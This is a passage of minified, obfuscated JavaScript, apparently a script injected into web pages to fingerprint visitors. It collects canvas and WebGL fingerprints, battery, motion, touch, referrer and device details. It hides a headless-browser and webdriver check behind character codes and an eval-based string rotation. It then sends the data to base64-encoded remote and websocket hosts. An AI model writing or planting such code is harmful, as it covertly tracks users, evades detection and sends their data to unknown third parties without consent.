a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};